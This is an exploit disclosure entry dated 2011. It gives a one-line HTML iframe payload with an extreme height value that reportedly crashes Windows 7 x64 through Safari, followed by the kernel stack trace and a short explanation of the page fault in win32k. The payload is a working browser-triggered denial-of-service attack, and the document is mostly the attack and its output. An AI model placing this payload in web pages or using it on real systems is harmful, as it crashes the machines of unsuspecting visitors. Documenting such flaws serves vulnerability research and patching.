# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil

<iframe height='18082563'></iframe>

---#---

STACK_TEXT:
fffff880`08b50f78 fffff800`0328e3bf : 00000000`00000050 fffff904`c2730258 00000000`00000001 fffff880`08b510e0 : nt!KeBugCheckEx
fffff880`08b50f80 fffff800`032e1d6e : 00000000`00000001 fffff904`c2730258 00000000`00002700 fffff880`08b51380 : nt! ?? ::FNODOBFM::`string'+0x44791
fffff880`08b510e0 fffff960`00164e2e : fffff960`00280a11 fffff900`c1f11320 fffff900`c273fe38 00000000`28451d38 : nt!KiPageFault+0x16e
fffff880`08b51278 fffff960`00280a11 : fffff900`c1f11320 fffff900`c273fe38 00000000`28451d38 00000011`00000001 : win32k!memmove+0x25e
fffff880`08b51280 fffff960`00280ca2 : fffff880`08b51380 00000000`000001dc fffff900`c2062c78 fffff904`c2730238 : win32k!NtGdiUpdateTransform+0x161
fffff880`08b512b0 fffff960`002815e4 : 00000000`000001dc fffff902`c2734638 00000000`0009f580 00000000`00000000 : win32k!NtGdiUpdateTransform+0x3f2
fffff880`08b51310 fffff960`00281854 : fffff900`c2730018 fffff900`c2062978 00000000`fffffff2 fffff900`00000001 : win32k!NtGdiUpdateTransform+0xd34
fffff880`08b514f0 fffff960`0028208e : fffff900`c1d1a028 00000000`00000000 fffff900`c2730018 00000000`00000000 : win32k!NtGdiUpdateTransform+0xfa4
fffff880`08b515b0 fffff960`002821fd : fffff900`c1d1a028 fffff900`c2062978 00000000`0009f580 fffff900`c1f11320 : win32k!NtGdiUpdateTransform+0x17de
fffff880`08b516d0 fffff960`002823bc : fffff900`c00c0010 00000000`0000003c fffff880`08b51b20 fffff900`c1d1a010 : win32k!EngNineGrid+0xb1
fffff880`08b51770 fffff960`00282879 : 00000000`00000000 fffff900`c2062978 00000000`00000000 fffff900`c1d1a010 : win32k!EngDrawStream+0x1a0
fffff880`08b51820 fffff960`002831cb : fffff880`08b51938 00000000`00000000 fffff900`c2062960 fffff900`c1f11320 : win32k!NtGdiDrawStreamInternal+0x47d
fffff880`08b518d0 fffff960`0029e93c : 00000000`3f010ad8 00000000`00000000 fffff880`08b51af0 fffff960`00000000 : win32k!GreDrawStream+0x917
fffff880`08b51ac0 fffff800`032e2ed3 : fffffa80`09777b60 00000000`00010000 00000000`000309c0 00000000`7efdb000 : win32k!NtGdiDrawStream+0x9c
fffff880`08b51c20 00000000`73f003fa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0021dd78 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x73f003fa

---#---

# Note on the trace: the first value shown for nt!KeBugCheckEx is 0x50, which
# appears to correspond to bug check PAGE_FAULT_IN_NONPAGED_AREA. The fault is
# raised in win32k!memmove (via nt!KiPageFault) on a path entered through the
# win32k!NtGdiDrawStream system call, i.e. in kernel mode, which is why the
# result is a system crash rather than a browser crash. "Version: Latest"
# refers to the software as of the date given in the header.